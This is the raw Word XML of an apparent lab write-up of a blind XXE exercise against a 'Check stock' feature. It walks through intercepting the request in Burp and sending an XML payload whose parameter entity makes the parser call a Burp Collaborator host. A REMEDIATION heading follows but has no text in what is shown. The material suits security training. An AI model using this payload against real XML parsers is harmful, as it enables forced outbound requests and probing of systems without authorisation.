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40AF721E" w:rsidR="00B36D89" w:rsidRPr="00EC3CC6" w:rsidRDefault="002D4948" w:rsidP="00DE3034">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The application is vulnerable to XXE out of band interaction as it </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4948">
        <w:t xml:space="preserve">has a "Check stock" feature that parses XML input but does not </w:t>
      </w:r>
      <w:r w:rsidR="00DE3034">
        <w:t>display any unexpected values, and blocks requests containing regular external entities.</w:t>
      </w:r>
      <w:r w:rsidR="005D3446">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00470E74">
        <w:t xml:space="preserve">We will </w:t>
      </w:r>
      <w:r w:rsidR="00DE3034">
        <w:t>use a parameter entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator</w:t>
      </w:r>
      <w:r w:rsidR="005E3653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B7B99E" w14:textId="7A6BDDEC" w:rsidR="00A0135C" w:rsidRDefault="00152623" w:rsidP="0045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web application and visit any product page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B241700" w14:textId="700C3741" w:rsidR="00CB17DB" w:rsidRDefault="00CB17DB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Send a Check Stock request and intercept the POST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Proxy tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5553ADDA" w14:textId="3222284E" w:rsidR="00E1363A" w:rsidRDefault="004F232A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Replace the XML body of the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with the Payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57781895" w14:textId="24A79C50" w:rsidR="00C36F78" w:rsidRPr="00E1363A" w:rsidRDefault="00C36F7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click Poll Now in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CC224F"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we see that we successfully </w:t>
      </w:r>
      <w:r w:rsidR="00DC6F94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">forced the application to make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an out of band </w:t>
      </w:r>
      <w:r w:rsidR="003D6F3C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interaction.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2515470B" w14:textId="77777777" w:rsidR="00760ECD" w:rsidRPr="00760ECD" w:rsidRDefault="00760ECD" w:rsidP="00760E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ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C532572" w14:textId="77777777" w:rsidR="00760ECD" w:rsidRPr="00760ECD" w:rsidRDefault="00760ECD" w:rsidP="00760E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ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00760ECD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760ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD065F2" w14:textId="77777777" w:rsidR="00760ECD" w:rsidRPr="00760ECD" w:rsidRDefault="00760ECD" w:rsidP="00760E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ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;!ENTITY % </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00760ECD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760ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYSTEM "http://3w0co0vuo2ft7atcu3ydqasvnmtch1.burpcollaborator.net"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E3E575" w14:textId="77777777" w:rsidR="00760ECD" w:rsidRPr="00760ECD" w:rsidRDefault="00760ECD" w:rsidP="00760E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ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00760ECD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760EC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EE68C99" w14:textId="77777777" w:rsidR="00760ECD" w:rsidRPr="00760ECD" w:rsidRDefault="00760ECD" w:rsidP="00760E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ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DACB448" w14:textId="77777777" w:rsidR="00760ECD" w:rsidRPr="00760ECD" w:rsidRDefault="00760ECD" w:rsidP="00760E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ECD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760ECD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760EC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758CFACE" w14:textId="77777777" w:rsidR="00760ECD" w:rsidRPr="00760ECD" w:rsidRDefault="00760ECD" w:rsidP="00760E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ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00760ECD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760ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;1&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00760ECD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760EC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3C7EAA12" w14:textId="77777777" w:rsidR="00760ECD" w:rsidRPr="00760ECD" w:rsidRDefault="00760ECD" w:rsidP="00760E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ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00760ECD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760ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;1&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00760ECD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760EC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58BCAABD" w14:textId="624F4A7B" w:rsidR="00595F51" w:rsidRDefault="00760ECD" w:rsidP="00760EC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60ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00760ECD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760EC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37E739F1" w14:textId="77777777" w:rsidR="00760ECD" w:rsidRDefault="00760ECD" w:rsidP="00760ECD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CCF8D0" w14:textId="5DF26A5C" w:rsidR="00595F51" w:rsidRDefault="00595F51" w:rsidP="00760ECD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C8CBB" w14:textId="77777777" w:rsidR="00595F51" w:rsidRPr="009F1CCE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595F51" w:rsidRPr="009F1CCE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50FA0"/>
    <w:rsid w:val="00152623"/>
    <w:rsid w:val="002D4948"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="003D6F3C"/>
    <w:rsid w:val="00455916"/>
    <w:rsid w:val="00470E74"/>
    <w:rsid w:val="004F232A"/>
    <w:rsid w:val="00586A86"/>
    <w:rsid w:val="00595F51"/>
    <w:rsid w:val="005D3446"/>
    <w:rsid w:val="005E3653"/>
    <w:rsid w:val="005E4E23"/>
    <w:rsid w:val="00760ECD"/>
    <w:rsid w:val="007649DD"/>
    <w:rsid w:val="009F1CCE"/>
    <w:rsid w:val="00A0135C"/>
    <w:rsid w:val="00A672AA"/>
    <w:rsid w:val="00B36D89"/>
    <w:rsid w:val="00C36F78"/>
    <w:rsid w:val="00C6154A"/>
    <w:rsid w:val="00CB17DB"/>
    <w:rsid w:val="00CC224F"/>
    <w:rsid w:val="00CE0A2A"/>
    <w:rsid w:val="00DC6F94"/>
    <w:rsid w:val="00DE3034"/>
    <w:rsid w:val="00E1363A"/>
    <w:rsid w:val="00E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CD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CD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2023-10-03T05:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-03T05:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>